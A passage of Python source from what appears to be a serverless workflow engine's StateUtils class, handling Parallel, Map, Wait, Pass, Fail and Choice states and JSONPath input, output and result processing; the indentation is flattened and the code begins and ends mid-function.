#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
parallelInfoKey = parallelName + "_" + key + "_parallel_info"
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
if parallelInfoKey in metadata:
parallelInfo = metadata[parallelInfoKey]
counterName = str(parallelInfo["CounterName"])
branchOutputKeys = parallelInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
#self._logger.debug("\t branchOutputKey:" + branchOutputKey)
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find ParallelInfo")
raise Exception("processBranchTerminalState Unable to find ParallelInfo")
if self.parsedfunctionstateinfo["End"] and "ParentMapInfo" in self.parsedfunctionstateinfo:
parentMapInfo = self.parsedfunctionstateinfo["ParentMapInfo"]
mapName = parentMapInfo["Name"]
mapInfoKey = mapName + "_" + key + "_map_info"
branchCounter = parentMapInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentMapInfo:" + json.dumps(parentMapInfo))
#self._logger.debug("\t mapName:" + mapName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
if mapInfoKey in metadata:
mapInfo = metadata[mapInfoKey]
rest = metadata["__function_execution_id"].split("_")[1:]
for codes in rest: # find marker for map state and use it to calculate current index
if "-M" in codes:
index = rest.index(codes)
current_index = int(rest[index].split("-M")[0])
self._logger.debug("[StateUtils] current_index: " + str(current_index))
if mapInfo["MaxConcurrency"] != 0:
current_index = current_index % int(mapInfo["MaxConcurrency"])
counterName = str(mapInfo["CounterName"])
branchOutputKeys = mapInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[current_index])
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
self._logger.debug("\t branchOutputKey:" + branchOutputKey)
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find MapInfo")
raise Exception("processBranchTerminalState Unable to find MapInfo")
def evaluatePostParallel(self, function_input, key, metadata, sapi):
action = metadata["__state_action"]
assert action == "post_parallel_processing"
counterValue = function_input["CounterValue"]
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
full_metadata = json.loads(full_metadata_encoded)
parallelInfoKey = self.functionstatename + "_" + key + "_parallel_info"
parallelInfo = full_metadata[parallelInfoKey]
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = parallelInfo["Klist"]
NumBranchesFinished = abs(counterValue)
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
counterName = str(parallelInfo["CounterName"])
assert py3utils.is_string(counterName)
counter_metadata_key_name = counterName + "_metadata"
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
sapi.delete(workflow_instance_metadata_storage_key)
post_parallel_output_values = []
for outputkey in parallelInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet:
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
post_parallel_output_values = post_parallel_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
else:
post_parallel_output_values = post_parallel_output_values + [None]
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if "Next" in self.parsedfunctionstateinfo:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], post_parallel_output_values)
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", post_parallel_output_values)
return function_input, full_metadata
def evaluateNonTaskState(self, function_input, key, metadata, sapi):
# 3. Evaluate Non Task states
#self._logger.debug("[StateUtils] NonTask state type: " + str(self.functionstatetype))
#self._logger.debug("[StateUtils] Welcome to evaluateNonTaskState! Current key:" + str(key))
function_output = None
if self.functionstatetype == StateUtils.choiceStateType:
#self._logger.debug("[StateUtils] Choice state info:" + str(self.functionstateinfo))
self.evaluateChoiceConditions(function_input) # this sets chosen Next state
#self._logger.debug("[StateUtils] Choice state Next:" + str(self.choiceNext))
function_output = function_input # output of the Choice state
elif self.functionstatetype == StateUtils.waitStateType:
#self._logger.debug("[StateUtils] Wait state info:" + str(self.functionstateinfo))
function_output = function_input
if "Seconds" in list(json.loads(self.functionstateinfo).keys()):
wait_state_seconds = json.loads(self.functionstateinfo)['Seconds']
#self._logger.debug("[StateUtils] Wait state seconds:" + str(wait_state_seconds))
time.sleep(float(wait_state_seconds))
elif "SecondsPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_secondspath = json.loads(self.functionstateinfo)['SecondsPath']
#self._logger.debug("[StateUtils] Wait state secondspath:" + str(wait_state_secondspath))
wait_state_secondspath_data = [match.value for match in parse(wait_state_secondspath).find(function_input)]
if wait_state_secondspath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamppath does not match: " + str(wait_state_secondspath))
raise Exception("Wait state timestamppath does not match")
#self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_secondspath_data[0]))
time.sleep(float(wait_state_secondspath_data[0]))
elif "Timestamp" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamp = json.loads(self.functionstateinfo)['Timestamp']
#self._logger.debug("[StateUtils] Wait state timestamp:" + str(wait_state_timestamp))
target_time = datetime.strptime(str(wait_state_timestamp), "%Y-%m-%dT%H:%M:%SZ")
current_time = datetime.utcnow()
#self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
#self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamp))
elif "TimestampPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamppath = json.loads(self.functionstateinfo)['TimestampPath']
self._logger.debug("[StateUtils] Wait state timestamppath:" + str(wait_state_timestamppath))
# need to communicate with datalayer for definition of trigger for hibernating/resuming task
wait_state_timestamppath_data = [match.value for match in parse(wait_state_timestamppath).find(function_input)]
if wait_state_timestamppath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamp_path does not match: " + str(wait_state_timestamppath))
raise Exception("Wait state timestamp_path does not match")
self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_timestamppath_data[0]))
target_time = datetime.strptime(str(wait_state_timestamppath_data[0]), "%Y-%m-%dT%H:%M:%SZ")
self._logger.debug("[StateUtils] Wait state timestamp data" + str(target_time))
current_time = datetime.utcnow()
self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining_time))
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
raise Exception("Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
else:
raise Exception("Wait state: Missing required field")
elif self.functionstatetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state handling, received value:" + str(function_input))
function_output = function_input
if "Result" in self.functionstateinfo:
pass_state_result = json.loads(self.functionstateinfo)['Result']
self._logger.debug("[StateUtils] Pass state result:" + str(pass_state_result))# self.functionstateinfo['Result']))
function_output = pass_state_result
elif self.functionstatetype == StateUtils.succeedStateType:
function_output = function_input
elif self.functionstatetype == StateUtils.failStateType:
self._logger.debug("[StateUtils] Fail state handling, received value:" + str(function_input))
self._logger.debug("[StateUtils] Fail state handling, received metadata:" + str(metadata))
if "Cause" in self.functionstateinfo:
fail_state_cause = json.loads(self.functionstateinfo)['Cause']
self._logger.debug("[StateUtils] Fail state cause info:" + str(fail_state_cause))
if "Error" in self.functionstateinfo:
error_state_error = json.loads(self.functionstateinfo)['Error']
self._logger.debug("[StateUtils] Fail state error info:" + str(error_state_error))
function_output = function_input
elif self.functionstatetype == StateUtils.parallelStateType:
self._logger.debug("[StateUtils] Parallel state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Parallel state handling metadata: " + str(metadata))
self._logger.debug("[StateUtils] Parallel state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_parallel_processing":
function_output, metadata = self.evaluateParallelState(function_input, key, metadata, sapi)
else:
if metadata["__state_action"] == "post_parallel_processing":
function_output, metadata = self.evaluatePostParallel(function_input, key, metadata, sapi)
elif self.functionstatetype == StateUtils.mapStateType:
name_prefix = self.functiontopic + "_" + key
self._logger.debug("[StateUtils] Map state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Map state handling metadata: " + str(metadata))
if "MaxConcurrency" in self.parsedfunctionstateinfo.keys():
maxConcurrency = int(self.parsedfunctionstateinfo["MaxConcurrency"])
else:
maxConcurrency = 0
self._logger.debug("[StateUtils] Map state maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] Map state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_map_processing":
# here we start the iteration process on a first batch
if maxConcurrency != 0:
tobeProcessednow = function_input[:maxConcurrency] # take the first maxConcurrency elements
tobeProcessedlater = function_input[maxConcurrency:] # keep the remaining elements for later
else:
tobeProcessednow = function_input
tobeProcessedlater = []
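# Example (hypothetical): with maxConcurrency = 2 and
# function_input = ["a", "b", "c", "d"], the first batch is ["a", "b"] and
# ["c", "d"] is parked in the data layer under <name_prefix>_tobeProcessedlater
# until the post_map_processing action picks it up.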
self._logger.debug("[StateUtils] Map state function_input split:" + str(tobeProcessednow) + " " + str(tobeProcessedlater))
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater)) # store elements to be processed on DL
sapi.put(name_prefix + "_" + "mapStatePartialResult", "[]") # initialise the collector variable
sapi.put(name_prefix + "_" + "mapInputCount", str(len(function_input)))
function_output, metadata = self.evaluateMapState(tobeProcessednow, key, metadata, sapi)
elif metadata["__state_action"] == "post_map_processing":
tobeProcessedlater = ast.literal_eval(sapi.get(name_prefix + "_" + "tobeProcessedlater")) # get all elements that have not yet been processed
self._logger.debug("[StateUtils] Map state post_map processing input:" + str(tobeProcessedlater))
# we need to decide at this point if there is a need for more batches. if so:
if len(tobeProcessedlater) > 0: # we need to start another batch
function_output, metadata2 = self.evaluatePostMap(function_input, key, metadata, sapi) # take care not to overwrite metadata
function_output, metadata = self.evaluateMapState(tobeProcessedlater[:maxConcurrency], key, metadata, sapi) # start a new batch
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater[maxConcurrency:])) # store remaining elements to be processed on DL
else:# no more batches required. we are at the iteration end, publish the final result
self._logger.debug("[StateUtils] Map state input final stage: " + str(function_input))
function_output, metadata = self.evaluatePostMap(function_input, key, metadata, sapi)
else:
raise Exception("Unknow action type in map state")
else:
raise Exception("Unknown state type")
return function_output, metadata
def applyResultPath(self, raw_state_input, function_output):
#4. Apply ResultPath, if available and if not 'Parallel' state
# if ResultPath:
# if ResultPath == '$' (this is the default value)
# raw_state_input_midway = function_output
# if ResultPath == 'null'
# raw_state_input_midway = raw_state_input
# if ResultPath == some variable name
# raw_state_input[some variable name] = function_output
# raw_state_input_midway = raw_state_input
# else:
# raw_state_input_midway = function_output
#
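# Example (hypothetical): with ResultPath = "$.result",
# raw_state_input = {"order": 7} and function_output = {"ok": True}, the state
# data becomes {"order": 7, "result": {"ok": True}}; with the default "$" the
# function output replaces the input entirely.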
raw_state_input_midway = raw_state_input
#self._logger.debug("Reached applyResultPath: " + str(self.result_path_dict))
try:
if self.result_path_dict and 'ResultPath' in self.result_path_dict:
raw_state_input_midway = self.process_result_path(self.result_path_dict, raw_state_input, function_output)
else:
raw_state_input_midway = function_output
return raw_state_input_midway
except Exception as exc:
raise Exception("Result path processing exception: " + str(exc))
#self._logger.exception("Result path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def applyOutputPath(self, raw_state_input_midway):
#5. Apply OutputPath, if available
# if OutputPath:
# if OutputPath == '$' (this is the default value)
# raw_state_output = raw_state_input_midway
# if OutputPath = 'null'
# raw_state_output = {}
# if OutputPath == some existing variable in 'raw_state_input_midway'
# raw_state_output = raw_state_input_midway[some existing variable]
# if OutputPath == some non-existing variable
# throw exception
# else:
# raw_state_output = raw_state_input_midway
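# Example (hypothetical): with OutputPath = "$.result" and
# raw_state_input_midway = {"order": 7, "result": {"ok": True}}, only
# {"ok": True} is published; OutputPath = null publishes an empty dict.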
raw_state_output = raw_state_input_midway
try:
if self.output_path_dict and 'OutputPath' in self.output_path_dict:
raw_state_output = self.process_output_path(self.output_path_dict, raw_state_input_midway)
else:
raw_state_output = raw_state_input_midway
return raw_state_output
except Exception as exc:
raise Exception("Output path processing exception: " + str(exc))
#self._logger.exception("Output path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def parse_function_state_info(self):
if self.functionstatetype == StateUtils.defaultStateType:
#self._logger.debug("Task_SAND state parsing. Not parsing further")
return
else:
self.parsedfunctionstateinfo = json.loads(self.functionstateinfo)
statedef = self.parsedfunctionstateinfo
statetype = self.functionstatetype
assert statetype == statedef['Type']
if statetype == StateUtils.waitStateType:
self._logger.debug("Wait state parsing")
if statetype == StateUtils.failStateType:
self._logger.debug("Fail state parsing")
if statetype == StateUtils.succeedStateType:
self._logger.debug("Succeed state parsing")
if statetype == StateUtils.taskStateType:
#self._logger.debug("Task state parsing")
if "InputPath" in statedef: # read the I/O Path dicts
self.input_path_dict['InputPath'] = statedef['InputPath']
#self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
#self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if "Catch" in statedef:
self.catcher_list = statedef['Catch']
# parse it once and store it
self.catcher_list = ast.literal_eval(str(self.catcher_list))
#self._logger.debug("found Catchers: " + str(self.catcher_list))
if "Retry" in statedef:
self.retry_list = statedef['Retry']
# parse it once and store it
self.retry_list = ast.literal_eval(str(self.retry_list))
#self._logger.debug("found Retry: " + str(self.retry_list))
if statetype == StateUtils.choiceStateType:
#self._logger.debug("Choice state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(statedef['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(statedef['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
self._logger.debug("Choice state rules: " + json.dumps(statedef))
if "Default" in statedef:
self.default_next_choice.append(statedef["Default"])
self._logger.debug("DefaultTarget: " + str(self.default_next_choice))
choices_list = statedef['Choices'] # get the choice rule list for this state
self._logger.debug("Choice state rules list: " + str(choices_list))
key_dict = {} # parse the choice rule list into an expression tree
for choices in choices_list:
self._logger.debug("Choice state rule element processed: " + json.dumps(list(choices.keys())))
#self._logger.debug("converted_function_output: " + str(converted_function_output))
operator_counter = 0
if ("Not" in list(choices.keys())) or ("And" in list(choices.keys())) or ("Or" in list(choices.keys())):
operator_counter += 1
if operator_counter == 0: # No operators, so no recursive evaluation required
self.traverse(choices['Next'], choices)
hostname = self.nodelist[-1].split("/")[0]
childname = self.nodelist[-1].split("/")[1]
previousnode = anytree.Node(choices['Next'])
root = previousnode
key_dict[hostname] = previousnode
previousnode = anytree.Node(childname, parent=previousnode) # key_dict[hostname])
#evalname = ast.literal_eval(str(previousnode.name))
else: # operator detected, we need to traverse the choice rule tree
self.traverse(choices['Next'], choices)
nodename = self.nodelist[-1].split("/")[0]
previousnode = anytree.Node(nodename)
root = previousnode
key_dict[self.nodelist[-1].split("/{")[0]] = previousnode
no_childs = 1 # we already have attached the root
for i in range(len(self.nodelist)): # count the nodes in the choice rule tree which do not have childs
children = self.nodelist[-(i+1)].split("/")[-1]
if children.strip("") == "{}":
no_childs += 1
for i in range(no_childs):
nodename = self.nodelist[-(i+2)].split("/")[i+1]
previousnode = anytree.Node(nodename, parent=previousnode)
key_dict[self.nodelist[-(i+2)].split("/{")[0]] = previousnode
# from now on we have to attach the children expressions
for i in range(len(self.nodelist)-no_childs):
childname = self.nodelist[-(i+no_childs+1)].split("/")[-1]
hostname = self.nodelist[-(i+no_childs+1)].split("/{")[0]
previousnode = anytree.Node(childname, key_dict[hostname])
#self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(root)))
self.parsed_trees.append(root)
if statetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.parallelStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.mapStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "ItemsPath" in statedef:
self.items_path_dict['ItemsPath'] = statedef['ItemsPath']
self._logger.debug("found ItemsPath: " + json.dumps(self.items_path_dict['ItemsPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
def EvaluateNode(self, node):
"""
Recursively parse the expression tree starting from given node into a python statement
"""
if not node.children: # this is a leaf node
evalname = json.dumps(ast.literal_eval(str(node.name)))
#type(evalname) == int or type(evalname) == float:
ev_expr = "(" + self.evaluate(evalname) + ")"
return ev_expr
else: #node is an operator
if node.name == "Not": # there can be only one child
child = node.children[0]
evalname = json.dumps(ast.literal_eval(str(child.name)))
ev_expr = self.evaluate(evalname)
return "not (%s)" % ev_expr
if node.name == "And": # collect all children recursively
child_and_array = []
for child in node.children:
child_and_array.append(self.EvaluateNode(child))
returnstr = "(" + " and ".join(child_and_array) + ")"
return returnstr
if node.name == "Or": # collect all children recursively
child_or_array = []
for child in node.children:
child_or_array.append(self.EvaluateNode(child))
returnstr = "(" + " or ".join(child_or_array) + ")"
return returnstr
else: # unknown operator found here, raise an error
raise Exception("Parse Error: unknown operator found: ", node.name)
def evaluate(self, expression):
"""
Evaluate an AWS Choice rule expression with the data contained in the values
"""
expr = []
ex = json.loads(expression)
self._logger.debug(expression)
vals = {}
if "Variable" in ex.keys():
k = ex["Variable"].split("$.")[1]
vals[k] = ""
expr.append(k)
for op in self.operators:
if op in ex.keys():
expr.append(self.operators_python[self.operators.index(op)])
expr.append(ex[op])
break
if isinstance(expr[2], (int, float)):
result = "%s %s %s" % (expr[0], expr[1], expr[2])
else:
result = "%s %s '%s'" % (expr[0], expr[1], expr[2]) # we want to compare strings with strings
return result
def process_parameters(self, parameters, state_data):
"""
Evaluate JSON path Parameters in conjunction with state_data
"""
parameters = parameters['Parameters']
ret_value = None
ret_item_value = None
if parameters == "$": # return unfiltered input data
ret_value = state_data
elif parameters is None: #return empty json
ret_value = {}
else: # contains a parameter filter, get it and return selected kv pairs
ret_value = {}
ret_index = {}
for key in parameters.keys(): # process parameters keys
if key.casefold() == "comment".casefold(): # ignore
ret_value[key] = parameters[key]
elif parameters[key] == "$$.Map.Item.Value": # get Items key
value_key = key.split(".$")[0]
ret_value = value_key
ret_item_value = value_key
elif parameters[key] == "$$.Map.Item.Index": # get Index key
index_key = key.split(".$")[0]
ret_index = index_key
else: # processing more complex Parameters values
if isinstance(parameters[key], dict): # parameters key refers to dict value
ret_value[key] = {}
for k in parameters[key]: # get nested keys
if not k.split(".")[-1] == "$": # parse static value
print (parameters[key][k])
ret_value[key][k] = parameters[key][k]
else:
new_key = k.split(".$")[0] # use the json paths in paramters to match
ret_value[key][new_key] = [match.value for match in parse(parameters[key][k]).find(state_data)][0]
return ret_value
if isinstance(parameters[key], str): # parameters key refers to string value
ret_value = {}
new_key = key.split(".$")[0] # get the parameters key
query_key = parameters[key].split("$.")[1] # extract the corresponding value key
new_value = state_data[query_key] # save the actual value before replacing the key
for kk in state_data.keys():
if isinstance(state_data[kk], dict): # value encapsulates dict
ret_value[new_key] = new_value
if ret_item_value != None:
ret_value[ret_item_value] = state_data[kk]
else:
raise Exception("Error: item value is not set!")
ret_value_dict = {}
ret_value_dict[kk] = ret_value
return ret_value_dict
if isinstance(state_data[kk], list): # value encapsulates list
ret_value_list = []
for data in state_data[kk]:
ret_value_list.append({new_key: new_value, ret_item_value: data})
ret_value_dict = {}
ret_value_dict[kk] = ret_value_list
return ret_value_dict
else:
raise Exception("Error: invaldid Parmeters format: " + str(parameters[key]))
# calculate transformed state output provided to Iterator
ret_total = []
ret_total_dict = {}
if isinstance(state_data, dict):
for kk in state_data.keys():
for key in state_data[kk]:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data[kk].index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data[kk].index(key) })
else:
raise Exception("Map State Parameters parse error on dict input: " + str(state_data))
ret_total_dict[kk] = ret_total
ret_value = ret_total_dict
elif isinstance(state_data, list):
for key in state_data:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data.index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data.index(key) })
else:
raise Exception("Map State Parameters parse error on list input: " + str(list))
ret_value = ret_total
else:
raise Exception("Map state parse error: invalid state input")
return ret_value
def process_items_path(self, path_fields, state_data):
ret_value = None
if 'ItemsPath' not in list(path_fields.keys()):
path_fields['ItemsPath'] = "$"
input_path = path_fields['ItemsPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty list
ret_value = []
else: # it contains a filter, get it and return selected list in input
self._logger.debug("seeing items_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
if not filtered_state_data:
raise Exception("Items Path processing exception: no match with map state item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def process_input_path(self, path_fields, state_data):
ret_value = None
if 'InputPath' not in list(path_fields.keys()):
path_fields['InputPath'] = "$"
#return state_data
input_path = path_fields['InputPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty dict
ret_value = {}
else: # input_path contains a filter, get and apply it
self._logger.debug("seeing input_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
self._logger.debug("after seeing input_path filter: " + str(filtered_state_data))
if not filtered_state_data:
raise Exception("Input Path processing exception: no match with state input item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def nested_dict(self, keys, value):
if len(keys) == 1:
return {keys[0]: value}
return {keys[0]: self.nested_dict(keys[1:], value)}
def process_result_path(self, path_fields, state_data, task_output):
ret_value = None
# path_fields: result path dict
# state_data: input dict
# task_output: output of the state/task
if 'ResultPath' not in list(path_fields.keys()):
path_fields['ResultPath'] = "$"
result_path = path_fields['ResultPath']
if result_path == "$":
ret_value = state_data
elif result_path is None:
ret_value = {}
else: # result_path is not empty so is there a match?
self._logger.debug("inside ResultPath processing: " + str(result_path) + " " + str(task_output) )
keys = list(tokenize(result_path)) # get all keys
filtered_state_data = self.nested_dict(keys[1:], task_output)
if isinstance(state_data, dict):
ret_value = dict(list(filtered_state_data.items()) + list(state_data.items())) # adding key and values to new dict
else:
ret_value = filtered_state_data
return ret_value
def process_output_path(self, path_fields, raw_state_input_midway):
ret_value = None
if 'OutputPath' not in list(path_fields.keys()):
path_fields['OutputPath'] = "$"
output_path = path_fields['OutputPath']
if output_path == "$":
ret_value = raw_state_input_midway
elif output_path is None:
ret_value = {}
else: # output_path is not empty so is there a match?
filtered_state_data = [match.value for match in parse(output_path).find(raw_state_input_midway)]
if not filtered_state_data:
raise Exception("Exception: no match with state input item, invalid path!")
else:
key = str(parse(output_path).nodes[-1].value[0])
filtered_state_data = raw_state_input_midway[key]
ret_value = filtered_state_data
return ret_value
def traverse(self, path, obj):
"""
        Traverse the object recursively and collect every path / value pair.
"""
cnt = -1
if isinstance(obj, dict):
d = obj
d_sum = {}
for k, v in list(d.items()):
if isinstance(v, dict):
self.traverse(path + "/" + k, v)
elif isinstance(v, list):
self.traverse(path + "/" + k, v)
else:
d_sum[k] = v
self.nodelist.append(path + "/" + str(d_sum))
if isinstance(obj, list):
li = obj
for e in li:
cnt += 1
if isinstance(e, dict):
self.traverse("{path}".format(path=path), e)
elif isinstance(e, list):
self.traverse("{path}".format(path=path), e)
def evaluateNextState(self, function_input):
        # this should be called for the Choice state only
        # for the rest, the next values are statically defined and parsed by the hostagent
if len(self.default_next_choice) > 0:
nextfunc = self.default_next_choice[-1]
self._logger.debug("[StateUtils] choice_function_input: " + str(function_input))
for tree in self.parsed_trees:
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(tree.root)))
##self._logger.debug("Resulting Rendered Tree Root: " + str(tree.root))
test = self.EvaluateNode(tree.children[0])
self._logger.debug("[StateUtils] choice test: " + str(test))
self._logger.debug("Resulting Parsed Expression: " + str(test))
self._logger.debug("Current Value String: " + json.dumps(function_input))
# Sample value input to choice {"Comment": "Test my Iterator function", "iterator": {"count": 10, "index": 5, "step": 1}}
for key in list(function_input.keys()):
new_test = "False"
key = str(key)
if key == "Comment":
continue
